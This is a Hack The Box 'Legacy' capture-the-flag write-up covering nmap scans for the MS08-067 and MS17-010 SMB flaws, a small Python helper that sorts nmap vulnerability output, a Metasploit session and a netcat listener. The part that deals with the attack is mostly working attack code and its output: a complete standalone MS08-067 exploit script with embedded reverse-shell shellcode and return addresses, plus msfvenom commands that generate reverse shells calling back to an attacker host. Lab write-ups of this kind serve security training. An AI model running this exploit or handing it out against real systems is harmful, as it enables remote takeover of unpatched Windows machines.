Today we are going to solve another CTF challenge, “Legacy”, a lab presented by Hack The Box for online penetration-testing practice matched to your experience level. They have a collection of vulnerable labs as challenges ranging from beginner to expert level. HTB splits its labs into two partitions, Active and Retired; since write-ups of Active labs cannot be published, we have chosen the retired Legacy lab.
Level: Beginner
Task: find the user.txt and root.txt files on the victim’s machine.
Let’s start with a basic nmap scan
As we know, on Windows XP port 445 was vulnerable to the netapi exploit, a remarkable vulnerability in the SMB protocol.
root@kali:~/htb/legacy# nmap -sS -sV -Pn 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:57 CET
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.53 seconds
Let’s confirm the SMB vulnerability on the victim’s system using an nmap script.
root@kali:~/htb/legacy# nmap --script vuln -p445 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:57 CET
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Stats: 0:00:45 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 10.10.10.4
Host is up (0.027s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|     Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|     code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 57.72 seconds
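Reading the `|`-prefixed tree by hand is fine for one host, but across a subnet the same output is better turned into a patch list. The following Python 3 helper is an added example, not part of the original post and unrelated to the exploit script later on; it parses the host-script section of `nmap --script vuln` output into which checks came back VULNERABLE or LIKELY VULNERABLE, which CVEs they map to, and which checks were inconclusive (errors, access denied) and must not be read as "safe". The sample report embedded in it is constructed from the scan shown above, and all function and variable names are my own.

```python
#!/usr/bin/env python3
"""Triage helper for `nmap --script vuln` host-script output (Python 3)."""
import re

# Constructed sample input, reconstructed from the scan shown on this page.
SAMPLE_REPORT = """\
Nmap scan report for 10.10.10.4
Host is up (0.027s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# A script result opens with "|_id:" or "| id:"; its detail lines are indented
# further, so a lowercase id directly after the marker is unambiguous.
SCRIPT_RE = re.compile(r"^\|[_ ]([a-z0-9][a-z0-9-]*):\s*(.*)$")
KEY_RE = re.compile(r"^[A-Za-z][A-Za-z ]*:")   # "State:", "IDs:", "VULNERABLE:" ...
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_vuln_report(text):
    """Return {"host", "ports", "scripts": {script_id: details}} for one host."""
    report = {"host": None, "ports": [], "scripts": {}}
    current = None
    for line in (l.rstrip() for l in text.splitlines()):
        m = HOST_RE.match(line)
        if m:
            report["host"] = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            report["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                    "state": m.group(3), "service": m.group(4)})
            continue
        m = SCRIPT_RE.match(line)
        if m:  # new script entry; "result" keeps one-line outcomes like "false"
            current = {"result": m.group(2), "state": None, "cves": [],
                       "risk": None, "summary": None, "references": []}
            report["scripts"][m.group(1)] = current
            continue
        if current is None or not line.startswith("|"):
            continue
        body = line.lstrip("|_ ")  # strip the tree drawing, keep the text
        if body.startswith("State:"):
            current["state"] = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):  # only the IDs line, so reference URLs do not duplicate CVEs
            current["cves"] = CVE_RE.findall(body)
        elif body.startswith("Risk factor:"):
            current["risk"] = body.split(":", 1)[1].strip()
        elif body.startswith("http"):
            current["references"].append(body)
        elif body and current["summary"] is None and not KEY_RE.match(body):
            current["summary"] = body  # first free-text line is the one-line description
    return report


def triage(report):
    """Checks nmap flagged as vulnerable, VULNERABLE ranked before LIKELY VULNERABLE."""
    rank = {"VULNERABLE": 0, "LIKELY VULNERABLE": 1}
    hits = [(sid, d["state"], d["cves"]) for sid, d in report["scripts"].items()
            if d["state"] in rank]
    return sorted(hits, key=lambda h: (rank[h[1]], h[0]))


def inconclusive_checks(report):
    """Scripts that returned an error or status instead of a verdict; rerun, do not assume safe."""
    return sorted(sid for sid, d in report["scripts"].items()
                  if d["state"] is None and d["result"] not in ("", "false"))


if __name__ == "__main__":
    rep = parse_vuln_report(SAMPLE_REPORT)
    open_ports = [p["port"] for p in rep["ports"] if p["state"] == "open"]
    print(f"{rep['host']}: open ports {open_ports}")
    for sid, state, cves in triage(rep):
        print(f"  PATCH   {sid:<24} {state:<18} {', '.join(cves)}")
    for sid in inconclusive_checks(rep):
        print(f"  RECHECK {sid}: {rep['scripts'][sid]['result']}")
```

The `false` result for smb-vuln-ms10-054 is treated as a clean negative, while `NT_STATUS_ACCESS_DENIED` and the ms10-061 script error are reported separately: a check that could not run says nothing about the host, which is the distinction that matters when deciding the scan is done.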
Then I ran msfconsole in a terminal to load the Metasploit framework and used an SMB exploit module against the target machine (the session below uses ms08_067_netapi).
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > check
[+] 10.10.10.4:445 - The target is vulnerable.
msf exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.13:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1211) at 2019-01-26 18:52:19 +0100

meterpreter > shell
Process 808 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
Inside C:\Documents and Settings\john\Desktop I found the user.txt file.
Inside C:\Documents and Settings\Administrator\Desktop I found the root.txt file.
Without Metasploit:
root@kali:~/htb# python MS08_067_2018.py 10.10.10.4 6 445
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer
#   - Added support for selecting a target port at the command line.
#   - Changed library calls to allow for establishing a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode.
#######################################################################

$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .

#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

root@kali:~/htb#
Code of MS08_067_2018.py:
#!/usr/bin/env python
import struct
import time
import sys
from threading import Thread  # Thread is imported incase you would like to modify

try:
    from impacket import smb
    from impacket import uuid
    #from impacket.dcerpc import dcerpc
    from impacket.dcerpc.v5 import transport
except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : https://github.com/CoreSecurity/impacket.git'
    print 'PyCrypto : https://pypi.python.org/pypi/pycrypto'
    sys.exit(1)

print '#######################################################################'
print '#   MS08-067 Exploit'
print '#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).'
print '#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'
print '#'
print '#   Mod in 2018 by Andy Acer'
print '#   - Added support for selecting a target port at the command line.'
print '#   - Changed library calls to allow for establishing a NetBIOS session for SMB transport'
print '#   - Changed shellcode handling to allow for variable length shellcode.'
print '#######################################################################\n'

print ('''
$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .
''')
print '#######################################################################\n'

# ------------------------------------------------------------------------
# REPLACE THIS SHELLCODE with shellcode generated for your use
# Note that length checking logic follows this section, so there's no need to count bytes or bother with NOPS.
#
# Example msfvenom commands to generate shellcode:
# msfvenom -p windows/shell_bind_tcp RHOST=10.11.1.229 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.112 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

# Reverse TCP to 10.11.0.112 port 443:
shellcode=(
"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x8e\xc8\x85\xbb\x83\xee\xfc\xe2\xf4\x72\x20\x07\xbb\x8e\xc8"
"\xe5\x32\x6b\xf9\x45\xdf\x05\x98\xb5\x30\xdc\xc4\x0e\xe9\x9a"
"\x43\xf7\x93\x81\x7f\xcf\x9d\xbf\x37\x29\x87\xef\xb4\x87\x97"
"\xae\x09\x4a\xb6\x8f\x0f\x67\x49\xdc\x9f\x0e\xe9\x9e\x43\xcf"
"\x87\x05\x84\x94\xc3\x6d\x80\x84\x6a\xdf\x43\xdc\x9b\x8f\x1b"
"\x0e\xf2\x96\x2b\xbf\xf2\x05\xfc\x0e\xba\x58\xf9\x7a\x17\x4f"
"\x07\x88\xba\x49\xf0\x65\xce\x78\xcb\xf8\x43\xb5\xb5\xa1\xce"
"\x6a\x90\x0e\xe3\xaa\xc9\x56\xdd\x05\xc4\xce\x30\xd6\xd4\x84"
"\x68\x05\xcc\x0e\xba\x5e\x41\xc1\x9f\xaa\x93\xde\xda\xd7\x92"
"\xd4\x44\x6e\x97\xda\xe1\x05\xda\x6e\x36\xd3\xa0\xb6\x89\x8e"
"\xc8\xed\xcc\xfd\xfa\xda\xef\xe6\x84\xf2\x9d\x89\x37\x50\x03"
"\x1e\xc9\x85\xbb\xa7\x0c\xd1\xeb\xe6\xe1\x05\xd0\x8e\x37\x50"
"\xeb\xde\x98\xd5\xfb\xde\x88\xd5\xd3\x64\xc7\x5a\x5b\x71\x1d"
"\x12\xd1\x8b\xa0\x8f\xb1\x80\xc5\xed\xb9\x8e\xc9\x3e\x32\x68"
"\xa2\x95\xed\xd9\xa0\x1c\x1e\xfa\xa9\x7a\x6e\x0b\x08\xf1\xb7"
"\x71\x86\x8d\xce\x62\xa0\x75\x0e\x2c\x9e\x7a\x6e\xe6\xab\xe8"
"\xdf\x8e\x41\x66\xec\xd9\x9f\xb4\x4d\xe4\xda\xdc\xed\x6c\x35"
"\xe3\x7c\xca\xec\xb9\xba\x8f\x45\xc1\x9f\x9e\x0e\x85\xff\xda"
"\x98\xd3\xed\xd8\x8e\xd3\xf5\xd8\x9e\xd6\xed\xe6\xb1\x49\x84"
"\x08\x37\x50\x32\x6e\x86\xd3\xfd\x71\xf8\xed\xb3\x09\xd5\xe5"
"\x44\x5b\x73\x65\xa6\xa4\xc2\xed\x1d\x1b\x75\x18\x44\x5b\xf4"
"\x83\xc7\x84\x48\x7e\x5b\xfb\xcd\x3e\xfc\x9d\xba\xea\xd1\x8e"
"\x9b\x7a\x6e"
)
# ------------------------------------------------------------------------

# Gotta make No-Ops (NOPS) + shellcode = 410 bytes
num_nops = 410 - len(shellcode)
newshellcode = "\x90" * num_nops
newshellcode += shellcode  # Add NOPS to the front
shellcode = newshellcode   # Switcheroo with the newshellcode temp variable

#print "Shellcode length: %s\n\n" % len(shellcode)

nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \
    "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10
disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \
    28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62"
ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01";
module_base = 0x6f880000


def generate_rop(rvas):
    gadget1 = "\x90\x5a\x59\xc3"
    gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]
    gadget3 = "\xcc\x90\xeb\x5a"
    ret = struct.pack('<L', 0x00018000)
    ret += struct.pack('<L', rvas['call_HeapCreate'] + module_base)
    ret += struct.pack('<L', 0x01040110)
    ret += struct.pack('<L', 0x01010101)
    ret += struct.pack('<L', 0x01010101)
    ret += struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret'] + module_base)
    ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
    ret += gadget1
    ret += struct.pack('<L', rvas['mov [eax], ecx / ret'] + module_base)
    ret += struct.pack('<L', rvas['jmp eax'] + module_base)
    ret += gadget2[0]
    ret += gadget2[1]
    ret += struct.pack('<L', rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base)
    ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
    ret += gadget2[2]
    ret += struct.pack('<L', rvas['mov [eax+0x10], ecx / ret'] + module_base)
    ret += struct.pack('<L', rvas['add eax, 8 / ret'] + module_base)
    ret += struct.pack('<L', rvas['jmp eax'] + module_base)
    ret += gadget3
    return ret


class SRVSVC_Exploit(Thread):
    def __init__(self, target, os, port=445):
        super(SRVSVC_Exploit, self).__init__()

        # MODIFIED HERE
        # Changed __port to port ... not sure if that does anything.  I'm a newb.
        self.port = port
        self.target = target
        self.os = os

    def __DCEPacket(self):
        if (self.os == '1'):
            print 'Windows XP SP0/SP1 Universal\n'
            ret = "\x61\x13\x00\x01"
            jumper = nonxjmper % (ret, ret)
        elif (self.os == '2'):
            print 'Windows 2000 Universal\n'
            ret = "\xb0\x1c\x1f\x00"
            jumper = nonxjmper % (ret, ret)
        elif (self.os == '3'):
            print 'Windows 2003 SP0 Universal\n'
            ret = "\x9e\x12\x00\x01"  # 0x01 00 12 9e
            jumper = nonxjmper % (ret, ret)
        elif (self.os == '4'):
            print 'Windows 2003 SP1 English\n'
            ret_dec = "\x8c\x56\x90\x7c"  # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
            ret_pop = "\xf4\x7c\xa2\x7c"  # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
            jmp_esp = "\xd3\xfe\x86\x7c"  # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
            disable_nx = "\x13\xe4\x83\x7c"  # 0x 7c 83 e4 13 NX disable @NTDLL.DLL
            jumper = disableNXjumper % (
                ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2)
        elif (self.os == '5'):
            print 'Windows XP SP3 French (NX)\n'
            ret = "\x07\xf8\x5b\x59"  # 0x59 5b f8 07
            disable_nx = "\xc2\x17\x5c\x59"  # 0x59 5c 17 c2
            # the nonxjmper also work in this case.
            jumper = nonxjmper % (disable_nx, ret)
        elif (self.os == '6'):
            print 'Windows XP SP3 English (NX)\n'
            ret = "\x07\xf8\x88\x6f"  # 0x6f 88 f8 07
            disable_nx = "\xc2\x17\x89\x6f"  # 0x6f 89 17 c2
            # the nonxjmper also work in this case.
            jumper = nonxjmper % (disable_nx, ret)
        elif (self.os == '7'):
            print 'Windows XP SP3 English (AlwaysOn NX)\n'
            rvasets = {'call_HeapCreate': 0x21286, 'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796, 'pop ecx / ret': 0x2e796 + 6, 'mov [eax], ecx / ret': 0xd296, 'jmp eax': 0x19c6f,
                       'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56, 'mov [eax+0x10], ecx / ret': 0x10a56 + 6, 'add eax, 8 / ret': 0x29c64}
            # the nonxjmper also work in this case.
            jumper = generate_rop(rvasets) + "AB"
        else:
            print 'Not supported OS version\n'
            sys.exit(-1)

        print '[-]Initiating connection'

        # MORE MODIFICATIONS HERE
        #############################################################################################
        if (self.port == '445'):
            self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
        else:
            # DCERPCTransportFactory doesn't call SMBTransport with necessary parameters. Calling directly here.
            # *SMBSERVER is used to force the library to query the server for its NetBIOS name and use that to
            #   establish a NetBIOS Session.  The NetBIOS session shows as NBSS in Wireshark.
            self.__trans = transport.SMBTransport(remoteName='*SMBSERVER', remote_host='%s' % self.target, dstport = int(self.port), filename = '\\browser' )

        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(
            ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
        path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + shellcode + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + \
            "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
        server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
        prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"

        # NEW HOTNESS
        # The Path Length and the "Actual Count" SMB parameter have to match. Path length in bytes
        #   is double the ActualCount field.  MaxCount also seems to match.  These fields in the SMB protocol
        #   store hex values in reverse byte order.  So: 36 01 00 00 => 00 00 01 36 => 310. No idea why it's "doubled"
        #   from 310 to 620. 620 = 410 shellcode + extra stuff in the path.
        MaxCount = "\x36\x01\x00\x00"  # Decimal 310. => Path length of 620.
        Offset = "\x00\x00\x00\x00"
        ActualCount = "\x36\x01\x00\x00"  # Decimal 310. => Path length of 620

        self.__stub = server + MaxCount + Offset + ActualCount + \
            path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00"
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        time.sleep(3)
        print 'Exploit finish\n'


if __name__ == '__main__':
    try:
        target = sys.argv[1]
        os = sys.argv[2]
        port = sys.argv[3]
    except IndexError:
        print '\nUsage: %s <target ip> <os #> <Port #>\n' % sys.argv[0]
        print 'Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445'
        print 'Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)'
        print 'Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal'
        print 'Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English'
        print 'Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)'
        print 'Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)'
        print 'Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)'
        print ''
        print 'FYI: nmap has a good OS discovery script that pairs well with this exploit:'
        print 'nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1'
        print ''
        sys.exit(-1)

    current = SRVSVC_Exploit(target, os, port)
    current.start()
root@kali:~/htb# nc -lvp 443
listening on [any] 443 ...
10.10.10.4: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.4] 1031
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>hostname
hostname
legacy

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.10.10.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 10.10.10.2

C:\WINDOWS\system32>
Author: Puckiestyle